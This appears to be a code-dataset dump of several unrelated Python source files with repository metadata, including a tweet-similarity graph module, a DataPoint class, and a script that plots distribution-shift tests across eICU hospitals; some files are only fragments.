] | null | null | null | src/nr/util/orderedset.py | NiklasRosenstein/python-nr.util | 087f2410d38006c1005a5fb330c47a56bcdb2279 | [
"MIT"
] | 3 | 2022-02-16T13:17:28.000Z | 2022-03-14T15:28:41.000Z | src/nr/util/orderedset.py | NiklasRosenstein/python-nr.util | 087f2410d38006c1005a5fb330c47a56bcdb2279 | [
"MIT"
] | null | null | null |
import collections
import functools
import typing as t
from nr.util.generic import T
T_OrderedSet = t.TypeVar('T_OrderedSet', bound='OrderedSet')
| 26.788732 | 73 | 0.656677 |
3c4ddc1c01b18295d9fb2f58c8e9a33ac6c57830 | 1,812 | py | Python | applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py | mith1979/ansible_automation | 013dfa67c6d91720b787fadb21de574b6e023a26 | [
"Apache-2.0"
] | null | null | null | applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py | mith1979/ansible_automation | 013dfa67c6d91720b787fadb21de574b6e023a26 | [
"Apache-2.0"
] | null | null | null | applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py | mith1979/ansible_automation | 013dfa67c6d91720b787fadb21de574b6e023a26 | [
"Apache-2.0"
] | null | null | null | import re
from netmiko.ssh_connection import SSHConnection
| 42.139535 | 93 | 0.657837 |
3c51be6bea74f985c0302d56a6e42f0067e94f0f | 4,287 | py | Python | K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py | cultural-ai/ConConCor | f5c30dfb7d38392f492f9c6e44c8d242f2820ce4 | [
"CC-BY-2.0"
] | 1 | 2021-12-14T10:19:55.000Z | 2021-12-14T10:19:55.000Z | K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py | cultural-ai/ConConCor | f5c30dfb7d38392f492f9c6e44c8d242f2820ce4 | [
"CC-BY-2.0"
] | null | null | null | K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py | cultural-ai/ConConCor | f5c30dfb7d38392f492f9c6e44c8d242f2820ce4 | [
"CC-BY-2.0"
] | null | null | null | """{Build token: cluster index}, hashes for each specified granularity level in the user-defined list 'clustering_levels_to_consider'
Output: level_xx_hash.json hash to /cluster_hashes
"""
import json
import os
import pickle as pkl
import typing
import numpy as np
def cluster_index_to_tokens(cluster_index: int, *, z: np.ndarray, tokens: list) -> list:
    """Expand a cluster index into the list of tokens it contains.

    Leaf indices (``cluster_index < len(tokens)``) map directly to a
    single token. Larger indices denote merged clusters whose two child
    indices are stored in the first two columns of row
    ``cluster_index - len(tokens)`` of ``z``. Tokens are returned in
    depth-first, left-to-right order, matching the recursive definition.
    """
    leaf_count = len(tokens)
    members = []
    stack = [cluster_index]
    while stack:
        idx = stack.pop()
        if idx < leaf_count:
            members.append(tokens[idx])
        else:
            left, right = z[idx - leaf_count, 0:2].astype(int)
            # Push right first so the left subtree is expanded first.
            stack.append(right)
            stack.append(left)
    return members
if __name__ == "__main__":
main()
| 37.278261 | 148 | 0.648239 |
3c529f808ec5b62668f3e070b0cf33366833814f | 3,434 | py | Python | cerebralcortex/core/datatypes/datapoint.py | hippietilley/CerebralCortex-Kernel | c7dac033d9561f14bdb72430577db6ae4e3c7911 | [
"BSD-2-Clause"
] | null | null | null | cerebralcortex/core/datatypes/datapoint.py | hippietilley/CerebralCortex-Kernel | c7dac033d9561f14bdb72430577db6ae4e3c7911 | [
"BSD-2-Clause"
] | null | null | null | cerebralcortex/core/datatypes/datapoint.py | hippietilley/CerebralCortex-Kernel | c7dac033d9561f14bdb72430577db6ae4e3c7911 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2018, MD2K Center of Excellence
# - Nasir Ali <nasir.ali08@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from datetime import datetime
from typing import Any
def __str__(self):
    # Render as "DataPoint(start, end, offset, sample)".
    # NOTE(review): the trailing newline is unusual for __str__; kept
    # because downstream printing may rely on it.
    return 'DataPoint(' + ', '.join(
        map(str, [self._start_time, self._end_time, self._offset, self._sample])) + ')\n'
def __repr__(self):
    # Same rendering as __str__ (not an eval-able round-trip form).
    return 'DataPoint(' + ', '.join(
        map(str, [self._start_time, self._end_time, self._offset, self._sample])) + ')\n'
def __lt__(self, dp):
    # Order DataPoints by their key. NOTE(review): getKey is not visible
    # in this chunk — presumably defined elsewhere on the class; confirm.
    # if hasattr(dp, 'getKey'):
    return self.getKey().__lt__(dp.getKey())
def __eq__(self, dp):
    # Equality is based on start time only.
    # NOTE(review): compares self._start_time with dp.start_time —
    # assumes ``start_time`` is an accessor mirroring ``_start_time``;
    # confirm on the class definition.
    return self._start_time == dp.start_time
def __hash__(self):
    # Hash on start time only, consistent with __eq__.
    return hash(('start_time', self.start_time))
| 33.019231 | 106 | 0.674432 |
3c5554bd05cd5239ce11e4e4dd8fa2e50df67f34 | 7,444 | py | Python | code/reveal_links.py | antonia42/DeLi | f07dc79a98eebccbcdcb4ee74eb4570190e6f441 | [
"MIT"
] | 1 | 2021-05-20T20:53:19.000Z | 2021-05-20T20:53:19.000Z | code/reveal_links.py | antonia42/DeLi | f07dc79a98eebccbcdcb4ee74eb4570190e6f441 | [
"MIT"
] | 1 | 2021-04-06T08:34:05.000Z | 2021-11-24T10:47:27.000Z | code/reveal_links.py | antonia42/DeLi | f07dc79a98eebccbcdcb4ee74eb4570190e6f441 | [
"MIT"
] | null | null | null | import sys
import networkx as nx
#from simhash import Simhash, SimhashIndex
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
# if there is a problem with gensim and Word2Vec, check the python version
# to be 2.7
# print('Hello from {}'.format(sys.version))
# TF-IDF helper function
def reveal_similar_links(G, cids, contents, threshold=0.5):
    """Add 'similarTo' edges between tweet-nodes with similar content.

    Computes TF-IDF vectors for all tweet contents, then pairwise cosine
    similarities, and adds an edge between every pair of tweet-nodes
    whose similarity exceeds ``threshold``.

    Args:
        G (networkx.Graph): Graph containing the tweet-nodes.
        cids (iterable): Tweet ids of the tweet-nodes, aligned with
            ``contents``.
        contents (iterable): Preprocessed tweet texts, aligned with
            ``cids``.
        threshold (float): Cosine-similarity cut-off for adding an edge.

    Returns:
        networkx.Graph: ``G`` with the similarity edges added.
    """
    # Materialize the inputs: Python 3 dict views / generators are not
    # indexable, and both are indexed below.
    cids = list(cids)
    contents = list(contents)
    try:
        tfidf = TfidfVectorizer(norm='l2', max_features=1000)
        tf_idf_matrix = tfidf.fit_transform(contents)
        # (A previous ``tf_idf_matrix.todense()`` call was a no-op whose
        # dense result was discarded; removed to save memory.)
        pairwise_similarity = tf_idf_matrix * tf_idf_matrix.T
        cos_matrix = pairwise_similarity.A
        tsize = len(contents)
        for i in range(0, tsize):
            for j in range(i + 1, tsize):
                # similarity score is in [-1, 1]
                sim_score = cos_matrix[i][j]
                if sim_score > threshold:
                    # reveal hidden edge (between similar tweet-nodes)
                    G.add_edge(cids[i], cids[j], edgetype='similarTo')
    except Exception:
        # Best-effort: e.g. an empty vocabulary makes fit_transform raise;
        # leave the graph unchanged. Narrowed from a bare ``except`` so
        # KeyboardInterrupt/SystemExit are no longer swallowed.
        pass
    return G
# Add edges between all pairs of similar content nodes based on TFIDF
def reveal_hidden_links_tfidf(G, content_dict, threshold):
    """Reveal hidden similarity edges between tweet-nodes using TF-IDF
    vectors and a cosine-similarity threshold.

    Args:
        G (networkx.Graph): Graph containing the tweet-nodes.
        content_dict (dict): Maps tweet id -> preprocessed tweet text.
        threshold (float): Cosine-similarity cut-off for adding an edge.

    Returns:
        networkx.Graph: The result of ``reveal_similar_links``, i.e. the
        graph enriched with edges between similar tweet-nodes.
    """
    # list() so the ids/contents are indexable on Python 3, where
    # dict.keys()/.values() return views; the two views iterate in the
    # same order, keeping ids and texts aligned.
    cids = list(content_dict.keys())
    contents = list(content_dict.values())
    return reveal_similar_links(G, cids, contents, threshold)
# Creates w-shingles for SimHash
def get_shingles(sentence, n):
    """
    Build the character shingles (n-grams) of a sentence for SimHash.

    The sentence is lower-cased first; each shingle is a run of 'n'
    consecutive characters. (Note: these are *character* n-grams, not word
    tuples.)
    Args:
        sentence (str): The sentence (preprocessed text from a tweet-node)
            from which the shingles will be created.
        n (int): The number of consecutive characters per shingle.
    Returns:
        A list with every character n-gram of the lower-cased sentence. For a
        sentence shorter than n characters, a single (truncated) shingle is
        returned.
    """
    text = sentence.lower()
    # Guarantee at least one shingle even when the text is shorter than n.
    total = max(len(text) - n + 1, 1)
    return [text[start:start + n] for start in range(total)]
# Add edges between all pairs of similar content nodes based on SimHash
def reveal_hidden_links_simhash(G, content_dict, threshold):
    """
    Function to reveal hidden similarity edges between tweet-nodes based on
    SimHash, an LSH approximation on TF-IDF vectors and a cosine similarity
    threshold.
    Args:
        G (networkx.Graph()): The initialized instance of the networkx Graph()
            class.
        content_dict (dict): The dict with the tweet ids from the tweet-nodes
            of the graph and the corresponding preprocessed tweet/content text.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceed this threshold, an edge is added in the graph
            between these nodes.
    Returns:
        The returning element of the function 'reveal_similar_links', a.k.a. an
        enriched graph instance, after revealing the hidden edges between
        similar tweet-nodes.
    """
    # Fingerprint each tweet with a SimHash over its character 3-shingles.
    # NOTE(review): f=1 configures a 1-bit fingerprint, which looks
    # suspiciously small for SimHash (the library default is 64) -- confirm
    # this is intentional.
    objs = []
    for cid, content in content_dict.items():
        objs.append((cid, Simhash(get_shingles(content, 3), f=1)))
    # k=2 is the bit-difference tolerance used by the LSH index.
    index = SimhashIndex(objs, f=1, k=2)
    # NOTE(review): 'index.bucket' is a private attribute of SimhashIndex;
    # each bucket groups candidate near-duplicates together.
    for key in index.bucket:
        bucket_item = index.bucket[key]
        contents = []
        cids = []
        for item in bucket_item:
            # Bucket entries appear to be '<hash part>,<tweet id>' strings;
            # the last comma-separated field is the tweet id.
            newid = str(item.split(',')[-1])
            contents.append(content_dict[newid])
            cids.append(newid)
        # Run the exact cosine-similarity test only within each candidate
        # bucket instead of over all O(n^2) pairs.
        G = reveal_similar_links(G, cids, contents, threshold)
    return G
# Add edges between all pairs of similar content nodes based on word2vec
def reveal_hidden_links_w2v(G, content_dict, threshold, model, k=3):
    """
    Function to reveal hidden similarity edges between tweet-nodes based on
    Word2Vec enriched TF-IDF vectors and a cosine similarity threshold. More
    specifically, for each word in a tweet, we add the 'k' most similar words
    according to the pre-trained Word2Vec model.
    Note: If you need to speed up the code during experimentation, it is better
    to calculate the Word2Vec enriched text and cache it.
    Args:
        G (networkx.Graph()): The initialized instance of the networkx Graph()
            class.
        content_dict (dict): The dict with the tweet ids from the tweet-nodes
            of the graph and the corresponding preprocessed tweet/content text.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceeds this threshold, an edge is added in the graph
            between these nodes.
        model (gensim.models.KeyedVectors()): The Google's pre-trained
            Word2Vec model.
        k (int): The number of similar words to add.
    Returns:
        The returning element of the function 'reveal_similar_links', a.k.a. an
        enriched graph instance, after revealing the hidden edges between
        similar tweet-nodes.
    """
    # Materialize the dict views as lists: 'reveal_similar_links' subscripts
    # 'cids' (cids[i]), which raises TypeError on a Python 3 dict view (an
    # error its bare 'except' would silently swallow). Lists also guarantee
    # cids and contents stay index-aligned.
    cids = list(content_dict.keys())
    contents = list(content_dict.values())
    enriched_contents = []
    for c in contents:
        words = c.split(' ')
        enriched_list = []
        for w in words:
            try:
                # Expand each word with its k nearest neighbours in the
                # Word2Vec vocabulary.
                w2v_sim_list = model.most_similar(w, topn=k)
                sim_words = [str(t[0]) for t in w2v_sim_list]
                enriched_list.append(' '.join(sim_words) + ' ' + w)
            except KeyError:
                # Out-of-vocabulary word: keep it as-is, without enrichment.
                enriched_list.append(w)
        # Always append so 'enriched_contents' stays index-aligned with
        # 'cids'. (str.split(' ') yields at least one token, so this list is
        # never empty; the old 'if len(...) > 0' guard could only have
        # silently misaligned the two lists.)
        enriched_contents.append(' '.join(enriched_list))
    return reveal_similar_links(G, cids, enriched_contents, threshold)
| 35.113208 | 79 | 0.657308 |
3c556dec90e23792b76acc982f2031b9cf0acc91 | 27,754 | py | Python | generate_hosp_plot.py | ChunaraLab/medshifts | cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b | [
"MIT"
] | 1 | 2021-11-25T12:26:16.000Z | 2021-11-25T12:26:16.000Z | generate_hosp_plot.py | ChunaraLab/medshifts | cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b | [
"MIT"
] | null | null | null | generate_hosp_plot.py | ChunaraLab/medshifts | cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b | [
"MIT"
] | null | null | null | '''
Modified from code by Stephan Rabanser https://github.com/steverab/failing-loudly
Plot test results across hospitals
Usage:
# region
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 4 --random_runs 100 --min_samples 5000 --sens_attr race --group --group_type regions --limit_samples
# beds
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 4 --random_runs 100 --min_samples 10000 --sens_attr race --group --group_type beds --limit_samples
# region, beds
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 5 --random_runs 100 --min_samples 5000 --sens_attr race --group --group_type regions_beds --limit_samples
# region, beds, teaching
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 6 --random_runs 100 --min_samples 4000 --sens_attr race --group --group_type regions_beds_teaching --limit_samples
# hospitals
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 10 --random_runs 100 --min_samples 1631 --sens_attr race --limit_samples
# python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 10 --random_runs 100 --min_samples 2000 --sens_attr race --limit_samples
'''
import argparse
from multiprocessing import Value
import pickle
import numpy as np
import seaborn as sns
import pandas as pd
from scipy import stats
from matplotlib.colors import ListedColormap
from itertools import combinations
seed = 1
np.random.seed(seed)
from shift_detector import *
from shift_locator import *
from shift_applicator import *
from data_utils import *
import os
import sys
from exp_utils import *
from plot_utils import *
# -------------------------------------------------
# CONFIG
# -------------------------------------------------
# make_keras_picklable()
np.set_printoptions(threshold=sys.maxsize)
parser = argparse.ArgumentParser()
parser.add_argument("--datset", type=str, default='eicu')
parser.add_argument("--path", type=str, default='orig')
parser.add_argument("--test_type", type=str, default='multiv')
parser.add_argument("--sens_attr", type=str, default='gender') # gender, race
parser.add_argument("--num_hosp", type=int, default=5)
parser.add_argument("--random_runs", type=int, default=10)
parser.add_argument("--min_samples", type=int, default=1500)
parser.add_argument("--group", action='store_true')
parser.add_argument("--group_type", type=str, default='hosp')
parser.add_argument("--limit_samples", action='store_true') # limit two-sample testing to 5000 samples
args = parser.parse_args()
# Unpack the CLI arguments into module-level configuration knobs.
datset = args.datset # sys.argv[1]
test_type = args.test_type # sys.argv[3]
use_group = args.group
group_type = args.group_type
sens_attr = args.sens_attr
limit_samples = args.limit_samples
# Group labels / column names for the chosen grouping (regions, beds, ...).
HospitalGroups_eicu, HospitalGroupsColnames_eicu = get_groups_colnames(group_type)
# path = './hosp_results_gossis_multiv/'
# Output directory encodes every experiment setting so runs do not collide.
path = './hosp_results_{}_{}_shuffle/'.format(datset, test_type)
path += '{}_group{}_{}_nh{}_run{}_mins{}_s{}_l{}_{}/'.format(datset, use_group, group_type, args.num_hosp, args.random_runs, args.min_samples, sens_attr, limit_samples, args.path)
if not os.path.exists(path):
    os.makedirs(path)
# Define train-test pairs of hospitals
NUM_HOSPITALS_TOP = args.num_hosp # 5 # hospitals with records >= 1000
hosp_pairs = []
# TODO move to data_utils
# Select hospital ids / feature-group definitions per dataset.
if datset =='eicu':
    if use_group:
        HospitalIDs = HospitalGroups_eicu
        HospitalIDsColnames = HospitalGroupsColnames_eicu
    else: # single hospitals
        HospitalIDs = HospitalIDs_eicu
        HospitalIDsColnames = HospitalIDs_eicu
    FeatureGroups = FeatureGroups_eicu
    # Define feature groups
    # feature_groups = [['labs','vitals','demo','others','saps2diff']]
    # feature_groups = [['labs','labs_blood_gas']]
    # feature_groups = [['vitals']]
    # feature_groups = [['demo']]
    # feature_groups = [['saps2labs','saps2vitals']]
    # feature_groups = [['saps2'], ['labs'], ['vitals'], ['demo']]
    feature_groups = [['saps2']]
    # feature_groups = [['saps2'], ['labs','vitals','demo','others']]
elif datset =='gossis':
    HospitalIDs = HospitalIDs_gossis
    HospitalIDsColnames = HospitalIDs_gossis
    FeatureGroups = FeatureGroups_gossis
    # Define feature groups
    feature_groups = [['APACHE_covariate']]
    # feature_groups = [['demographic'], ['vitals'], ['labs','labs_blood_gas'],['APACHE_covariate']]
    # feature_groups = [['APACHE_covariate'], ['labs','labs_blood_gas'], ['vitals'], ['APACHE_comorbidity'],
    # ['demographic','vitals','labs','labs_blood_gas','APACHE_comorbidity']]
# Keep only the first NUM_HOSPITALS_TOP hospitals/groups.
HospitalIDs = HospitalIDs[:NUM_HOSPITALS_TOP]
HospitalIDsColnames = HospitalIDsColnames[:NUM_HOSPITALS_TOP]
# HospitalIDs = [i for i in HospitalIDs if i not in [413,394,199,345]]
# Build the full cartesian product of (train, test) hospital pairs,
# including the self-pairs on the diagonal.
for hi in range(len(HospitalIDs)):
    for hj in range(len(HospitalIDs)):
        hosp_pairs.append((hi,hj,[HospitalIDs[hi]],[HospitalIDs[hj]]))
# hosp_pairs = [([394],[416])]
print('Use groups', use_group, 'Sensitive attribute', sens_attr, 'Hospital pairs', hosp_pairs)
# Define DR methods
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value, DimensionalityReduction.UAE.value, DimensionalityReduction.TAE.value, DimensionalityReduction.BBSDs.value, DimensionalityReduction.BBSDh.value]
dr_techniques = [DimensionalityReduction.NoRed.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value]
if test_type == 'multiv':
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value, DimensionalityReduction.UAE.value, DimensionalityReduction.TAE.value, DimensionalityReduction.BBSDs.value]
dr_techniques = [DimensionalityReduction.NoRed.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value]
if test_type == 'univ':
dr_techniques_plot = dr_techniques.copy()
# dr_techniques_plot.append(DimensionalityReduction.Classif.value)
else:
dr_techniques_plot = dr_techniques.copy()
# Define test types and general test sample sizes
test_types = [td.value for td in TestDimensionality]
if test_type == 'multiv':
od_tests = []
md_tests = [MultidimensionalTest.MMD.value]
# samples = [10, 20, 50, 100, 200, 500, 1000]
# samples = [100, 1000]
samples = [args.min_samples]
# samples = [2500]
# samples = [1000, 1500]
# samples = [10, 20, 50, 100, 200]
else:
# od_tests = [od.value for od in OnedimensionalTest]
od_tests = [OnedimensionalTest.KS.value]
md_tests = []
# samples = [10, 20, 50, 100, 200, 500, 1000, 9000]
# samples = [100, 1000]
samples = [args.min_samples]
# samples = [2500]
# samples = [1000, 1500]
# samples = [10, 20, 50, 100, 200, 500]
difference_samples = 10
# Number of random runs to average results over
random_runs = args.random_runs # 5
# Signifiance level
sign_level = 0.05
# sign_level = 0.01
# Define shift types
# if args.path == 'orig': # sys.argv[2]
# shifts = ['orig']
# brightness = [0.75]
# # shifts = ['rand', 'orig']
# # brightness = [1.25, 0.75]
# else:
# shifts = []
shifts = ['orig']
# -------------------------------------------------
# PIPELINE START
# -------------------------------------------------
sns.set_style("ticks")
cmap = sns.color_palette("rocket_r", as_cmap=True)
# cmap = sns.color_palette("vlag", as_cmap=True)
# cmap = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
# Discrete colormap using code by lanery https://stackoverflow.com/questions/38836154/discrete-legend-in-seaborn-heatmap-plot
cmap_binary = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0)
# Number of per-pair evaluation metrics stored in the result arrays.
NUM_METRICS = 36
# Result tensors, initialized to -1 as a "missing" sentinel. Axis layout is
# (samples, shifts, runs, DR techniques, feature groups, hospital pairs).
samples_shifts_rands_dr_tech_feats_hosps = np.ones((len(samples), len(shifts), random_runs, len(dr_techniques_plot), len(feature_groups), len(hosp_pairs))) * (-1)
samples_shifts_rands_dr_tech_feats_hosps_t_val = np.ones((len(samples), len(shifts), random_runs, len(dr_techniques_plot), len(feature_groups), len(hosp_pairs))) * (-1)
samples_shifts_rands_feats_hosps_te_acc = np.ones((len(samples), len(shifts), random_runs, len(feature_groups), len(hosp_pairs), NUM_METRICS)) * (-1) # 0-auc, 1-smr # TODO add auc, smr, p-val, mmd in same array. add hosp_pair
samples_shifts_rands_feats_hosp_pairs_te_acc = np.ones((len(samples), len(shifts), random_runs, len(feature_groups), len(HospitalIDs), len(HospitalIDs), NUM_METRICS)) * (-1) # 0-auc, 1-smr # TODO add auc, smr, p-val, mmd in same array. add hosp_pair
# Aggregation pass: load the per-(feature group, hospital pair) results that
# an earlier experiment run saved to disk and collect them into the tensors.
for feature_group_idx, feature_group in enumerate(feature_groups):
    target = FeatureGroups['outcome']
    # Flatten the feature group into its member feature names.
    feature_set = []
    for group in feature_group:
        feature_set += FeatureGroups[group]
    # Per-feature p/t values (univariate tests only); -1 = missing sentinel.
    samples_shifts_rands_feat_hosps_p_vals = np.ones((len(samples), len(shifts), len(dr_techniques_plot), len(od_tests), len(feature_set), random_runs, len(hosp_pairs))) * (-1)
    samples_shifts_rands_feat_hosps_t_vals = np.ones((len(samples), len(shifts), len(dr_techniques_plot), len(od_tests), len(feature_set), random_runs, len(hosp_pairs))) * (-1)
    for hosp_pair_idx, (hosp_train_idx, hosp_test_idx, hosp_train, hosp_test) in enumerate(hosp_pairs):
        print("\n==========\nFeature Set, Hosp Train, Hosp Test", feature_group, hosp_train, hosp_test)
        print("==========\n")
        # Result files live under <path>/<feature_group>/tr_<train>_ts_<test>/.
        feats_path = path + "_".join(feature_group) + '/'
        hosp_folder_name = 'tr_' + '_'.join(map(str, hosp_train)) + '_ts_' + '_'.join(map(str, hosp_test))
        hosp_path = feats_path + hosp_folder_name + '/'
        samples_shifts_rands_dr_tech = np.load("%s/samples_shifts_rands_dr_tech.npy" % (hosp_path))
        samples_shifts_rands_dr_tech_t_val = np.load("%s/samples_shifts_rands_dr_tech_t_val.npy" % (hosp_path))
        with open("%s/samples_shifts_rands_metrics.pkl" % (hosp_path), 'rb') as fr:
            metric_results = pickle.load(fr)
        # print("sadf", "%s/samples_shifts_rands_metrics.pkl" % (hosp_path))
        # print(metric_results.results_train[0,0,0])
        samples_shifts_rands_te_acc, metric_names = get_metrics_array(metric_results)
        # Slot this pair's results into the global tensors.
        samples_shifts_rands_dr_tech_feats_hosps[:,:,:,:,feature_group_idx,hosp_pair_idx] = samples_shifts_rands_dr_tech
        samples_shifts_rands_dr_tech_feats_hosps_t_val[:,:,:,:,feature_group_idx,hosp_pair_idx] = samples_shifts_rands_dr_tech_t_val
        samples_shifts_rands_feats_hosps_te_acc[:,:,:,feature_group_idx,hosp_pair_idx,:] = samples_shifts_rands_te_acc
        samples_shifts_rands_feats_hosp_pairs_te_acc[:,:,:,feature_group_idx,hosp_train_idx,hosp_test_idx,:] = samples_shifts_rands_te_acc
        if test_type == 'univ':
            samples_shifts_rands_feat_p_vals = np.load("%s/samples_shifts_rands_feat_p_vals.npy" % (hosp_path))
            samples_shifts_rands_feat_t_vals = np.load("%s/samples_shifts_rands_feat_t_vals.npy" % (hosp_path))
            samples_shifts_rands_feat_hosps_p_vals[:,:,:,:,:,:,hosp_pair_idx] = samples_shifts_rands_feat_p_vals
            samples_shifts_rands_feat_hosps_t_vals[:,:,:,:,:,:,hosp_pair_idx] = samples_shifts_rands_feat_t_vals
    # Persist the per-feature-group tensors (uses the last pair's feats_path,
    # which is the same for every pair of this feature group).
    np.save("%s/samples_shifts_rands_feat_hosps_p_vals.npy" % (feats_path), samples_shifts_rands_feat_hosps_p_vals)
    np.save("%s/samples_shifts_rands_feat_hosps_t_vals.npy" % (feats_path), samples_shifts_rands_feat_hosps_t_vals)
# Persist the fully aggregated tensors at the experiment root.
np.save("%s/samples_shifts_rands_dr_tech_feats_hosps.npy" % (path), samples_shifts_rands_dr_tech_feats_hosps)
np.save("%s/samples_shifts_rands_dr_tech_feats_hosps_t_val.npy" % (path), samples_shifts_rands_dr_tech_feats_hosps_t_val)
np.save("%s/samples_shifts_rands_feats_hosps_te_acc.npy" % (path), samples_shifts_rands_feats_hosps_te_acc)
np.save("%s/samples_shifts_rands_feats_hosp_pairs_te_acc.npy" % (path), samples_shifts_rands_feats_hosp_pairs_te_acc)
# Feat, dr, shift, sample - mean
for feature_group_idx, feature_group in enumerate(feature_groups):
print("==========\nPlotting", feature_group)
print("==========")
target = FeatureGroups['outcome']
feature_set = []
for group in feature_group:
feature_set += FeatureGroups[group]
feats_path = path + "_".join(feature_group) + '/'
if test_type == 'univ':
samples_shifts_rands_feat_hosps_p_vals = np.load("%s/samples_shifts_rands_feat_hosps_p_vals.npy" % (feats_path))
samples_shifts_rands_feat_hosps_t_vals = np.load("%s/samples_shifts_rands_feat_hosps_t_vals.npy" % (feats_path))
for dr_idx, dr in enumerate(dr_techniques_plot):
for shift_idx, shift in enumerate(shifts):
for si, sample in enumerate(samples):
hosp_pair_pval = np.ones((len(HospitalIDs), len(HospitalIDs))) * (-1)
hosp_pair_tval = np.ones((len(HospitalIDs), len(HospitalIDs))) * (-1)
if test_type == 'univ':
# hosp_pair_feat_pval = np.ones((len(hosp_pairs), len(feature_set), random_runs))
hosp_pair_feat_pval = np.ones((len(hosp_pairs), len(feature_set)))
hosp_pair_feat_tval = np.ones((len(hosp_pairs), len(feature_set)))
for hosp_pair_idx, (hosp_train_idx, hosp_test_idx, hosp_train, hosp_test) in enumerate(hosp_pairs):
feats_dr_tech_shifts_samples_results = samples_shifts_rands_dr_tech_feats_hosps[si,shift_idx,:,dr_idx,feature_group_idx,hosp_pair_idx]
feats_dr_tech_shifts_samples_results_t_val = samples_shifts_rands_dr_tech_feats_hosps_t_val[si,shift_idx,:,dr_idx,feature_group_idx,hosp_pair_idx]
mean_p_vals = np.mean(feats_dr_tech_shifts_samples_results)
std_p_vals = np.std(feats_dr_tech_shifts_samples_results)
mean_t_vals = np.mean(feats_dr_tech_shifts_samples_results_t_val)
hosp_pair_pval[hosp_train_idx, hosp_test_idx] = mean_p_vals < sign_level
hosp_pair_tval[hosp_train_idx, hosp_test_idx] = mean_t_vals
# adjust_sign_level = sign_level / len(hosp_pairs)
adjust_sign_level = sign_level
if test_type == 'univ':
dr_tech_shifts_samples_results_feat_p_val = samples_shifts_rands_feat_hosps_p_vals[si,shift_idx,dr_idx,0,:,:,hosp_pair_idx] # TODO iterate for od_tests
dr_tech_shifts_samples_results_feat_t_val = samples_shifts_rands_feat_hosps_t_vals[si,shift_idx,dr_idx,0,:,:,hosp_pair_idx] # TODO iterate for od_tests
mean_feat_p_vals = np.mean(dr_tech_shifts_samples_results_feat_p_val, axis=1)
mean_feat_t_vals = np.mean(dr_tech_shifts_samples_results_feat_t_val, axis=1)
# hosp_pair_feat_pval[hosp_pair_idx, :, :] = dr_tech_shifts_samples_results_feat_p_val
hosp_pair_feat_pval[hosp_pair_idx, :] = mean_feat_p_vals < adjust_sign_level
hosp_pair_feat_tval[hosp_pair_idx, :] = mean_feat_t_vals
# p-value MMD test
hosp_avg_pval = hosp_pair_pval.mean(axis=1)
hosp_pair_pval_triu = np.triu(np.ones_like(hosp_pair_pval, dtype=np.bool))
np.fill_diagonal(hosp_pair_pval_triu, False)
hosp_pair_pval = pd.DataFrame(hosp_pair_pval, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_pval.to_csv("%s/%s_%s_%s_%s_p_val_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
# cmap_binary = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0)
# fig = sns.heatmap(hosp_pair_pval, linewidths=0.5, cmap=ListedColormap(cmap_binary))
fig = sns.heatmap(hosp_pair_pval, mask=hosp_pair_pval_triu, linewidths=0.5, cmap=ListedColormap(cmap_binary))
colorbar = fig.collections[0].colorbar
